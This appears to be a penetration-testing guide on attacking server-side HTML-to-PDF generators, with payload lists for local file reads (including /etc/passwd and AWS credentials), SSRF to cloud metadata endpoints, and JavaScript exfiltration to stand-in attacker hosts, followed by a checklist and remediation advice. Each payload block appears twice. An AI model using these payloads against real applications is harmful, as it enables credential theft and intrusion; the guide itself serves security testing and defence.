PDF Generation Attacks
Many web applications generate PDFs server-side using HTML-to-PDF converters (wkhtmltopdf, WeasyPrint, Puppeteer, Chrome headless, Prince). When user-controlled content is rendered into PDFs, attackers can exploit the converter for SSRF, local file reading, XSS execution, and information disclosure.
Information
Local File Read
# If user input is rendered in the PDF, inject HTML/JS to read local files:
# iframe method (works on wkhtmltopdf):
<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
# embed method:
<embed src="file:///etc/passwd" type="text/plain" width="800" height="500">
# object method:
<object data="file:///etc/passwd" type="text/plain" width="800" height="500"></object>
# JavaScript XMLHttpRequest (if JS is enabled):
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
document.write('<pre>' + xhr.responseText + '</pre>');
</script>
# Fetch API:
<script>
fetch('file:///etc/passwd')
.then(r => r.text())
.then(t => document.write('<pre>' + t + '</pre>'));
</script>
# Read environment variables (Linux):
<iframe src="file:///proc/self/environ" width="800" height="500"></iframe>
# Read AWS credentials:
<iframe src="file:///home/app/.aws/credentials" width="800" height="500"></iframe># If user input is rendered in the PDF, inject HTML/JS to read local files:
# iframe method (works on wkhtmltopdf):
<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
# embed method:
<embed src="file:///etc/passwd" type="text/plain" width="800" height="500">
# object method:
<object data="file:///etc/passwd" type="text/plain" width="800" height="500"></object>
# JavaScript XMLHttpRequest (if JS is enabled):
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
document.write('<pre>' + xhr.responseText + '</pre>');
</script>
# Fetch API:
<script>
fetch('file:///etc/passwd')
.then(r => r.text())
.then(t => document.write('<pre>' + t + '</pre>'));
</script>
# Read environment variables (Linux):
<iframe src="file:///proc/self/environ" width="800" height="500"></iframe>
# Read AWS credentials:
<iframe src="file:///home/app/.aws/credentials" width="800" height="500"></iframe>SSRF via PDF Generation
# Force the PDF generator to make HTTP requests to internal services:
# Image tag SSRF:
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
# Link tag:
<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
# JavaScript-based SSRF:
<script>
var img = new Image();
img.src = 'http://internal-api:8080/admin?data=' +
btoa(document.documentElement.innerHTML);
</script>
# Redirect chain:
<meta http-equiv="refresh" content="0;url=http://169.254.169.254/latest/meta-data/">
# CSS-based SSRF:
<style>
@import url('http://169.254.169.254/latest/meta-data/');
body { background: url('http://internal:8080/admin'); }
</style>
# SVG-based SSRF:
<svg xmlns="http://www.w3.org/2000/svg">
<image href="http://169.254.169.254/latest/meta-data/" />
</svg># Force the PDF generator to make HTTP requests to internal services:
# Image tag SSRF:
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">
# Link tag:
<link rel="stylesheet" href="http://169.254.169.254/latest/meta-data/">
# JavaScript-based SSRF:
<script>
var img = new Image();
img.src = 'http://internal-api:8080/admin?data=' +
btoa(document.documentElement.innerHTML);
</script>
# Redirect chain:
<meta http-equiv="refresh" content="0;url=http://169.254.169.254/latest/meta-data/">
# CSS-based SSRF:
<style>
@import url('http://169.254.169.254/latest/meta-data/');
body { background: url('http://internal:8080/admin'); }
</style>
# SVG-based SSRF:
<svg xmlns="http://www.w3.org/2000/svg">
<image href="http://169.254.169.254/latest/meta-data/" />
</svg>Data Exfiltration
# If the PDF is returned to the attacker, data appears in the rendered PDF.
# If NOT, exfiltrate via outbound HTTP:
<script>
// Read a local file and exfiltrate it:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var data = btoa(xhr.responseText);
// Exfiltrate via image request:
var img = new Image();
img.src = 'http://ATTACKER_SERVER/exfil?data=' + data;
</script>
# DNS-based exfiltration (if HTTP is blocked):
<script>
var data = btoa('sensitive-data').substring(0, 60);
var img = new Image();
img.src = 'http://' + data + '.attacker.com/x.png';
</script># If the PDF is returned to the attacker, data appears in the rendered PDF.
# If NOT, exfiltrate via outbound HTTP:
<script>
// Read a local file and exfiltrate it:
var xhr = new XMLHttpRequest();
xhr.open('GET', 'file:///etc/passwd', false);
xhr.send();
var data = btoa(xhr.responseText);
// Exfiltrate via image request:
var img = new Image();
img.src = 'http://ATTACKER_SERVER/exfil?data=' + data;
</script>
# DNS-based exfiltration (if HTTP is blocked):
<script>
var data = btoa('sensitive-data').substring(0, 60);
var img = new Image();
img.src = 'http://' + data + '.attacker.com/x.png';
</script>Testing Checklist
- 1. Identify PDF generation features (invoices, reports, exports, receipts)
- 2. Determine what user input appears in the PDF
- 3. Test HTML injection by inserting <h1>test</h1> — does it render?
- 4. Test JavaScript execution with <script>document.write('XSS')</script>
- 5. Test file:// protocol for local file read
- 6. Test SSRF via img, link, import, and script tags
- 7. Test for cloud metadata access (169.254.169.254)
- 8. Check PDF metadata for generator version information
Evidence Collection
Rendered PDF: PDF file showing injected content, file contents, or SSRF results
Request: The input that triggered the injection
CVSS Range: HTML injection: 4.3–6.1 | Local file read: 7.5–8.6 | SSRF to cloud metadata: 9.1
Remediation
- Sanitize HTML input: Strip all HTML tags or use allowlists for safe formatting tags only.
- Disable JavaScript: Configure the PDF generator to disable JS execution (wkhtmltopdf:
--disable-javascript). - Block file:// protocol: Disable local file access in the PDF renderer.
- Network isolation: Run PDF generation in a sandbox with no access to internal networks or cloud metadata.
- Use data-driven templates: Pass data to templates instead of allowing user-controlled HTML.
False Positive Identification
- HTML rendering without SSRF: The PDF engine rendering HTML doesn't mean it can make external requests — verify with an external callback (webhook/Burp Collaborator) before classifying as SSRF.
- Local file read blocked by sandbox: Some PDF engines sandbox file:// access — getting an error instead of file content means the sandbox is working.
- CSS injection without impact: Injecting CSS that changes PDF appearance is cosmetic — focus on data exfiltration, SSRF, and file read capabilities.